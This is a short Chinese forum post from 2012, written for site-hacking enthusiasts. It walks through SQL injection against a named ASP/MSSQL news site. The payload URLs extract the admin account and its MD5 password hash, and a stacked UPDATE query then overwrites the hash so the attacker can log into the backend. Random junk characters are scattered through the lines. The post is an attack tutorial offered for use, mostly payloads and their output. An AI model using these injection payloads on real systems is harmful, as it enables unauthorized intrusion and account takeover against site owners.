经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
+ r/ `$ {: G l. O可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)# H6 z9 A2 P n% @
测试如下:4 A2 Y" @& T$ F+ ^* u" ?
http://www.tmdsb.com/news.asp?id=121
9 M2 {( j" O- L: R* D在地址后输入单引号,显示 J3 h6 _, Y! L. \! F
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’: T% N( p5 f0 |& l; L; e
字符串 ’’’ 之前有未闭合的引号+ z" Q0 C$ d; K+ w3 N
/news/tmdws.asp,行63+ `% @" E+ _# C; p
说明没有过滤单引号且数据库是MSSQL./ ^6 p2 _7 M' h+ ^" m0 r+ V: |
and 1=1正常。and 1=2出错。肯定存在注入4 ~3 z: J& b X A2 ^1 k* s
接着输入2 Q$ @* Q- Z7 H3 R& Q
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
l% v+ P8 t" x7 m# y5 v得到帐号为:admin9 D& o( }5 v4 T
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)- d0 l+ C$ U. A1 e. W' Z
得到密码为:a4716077c2ba075c
: M* i. x( }3 V接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294338 C: U b+ Z5 e2 `& `: n" L8 e
命令如下 :
3 y: i% g8 z$ o: P;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
) E0 U+ ~ P( Q: k, n! Z这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41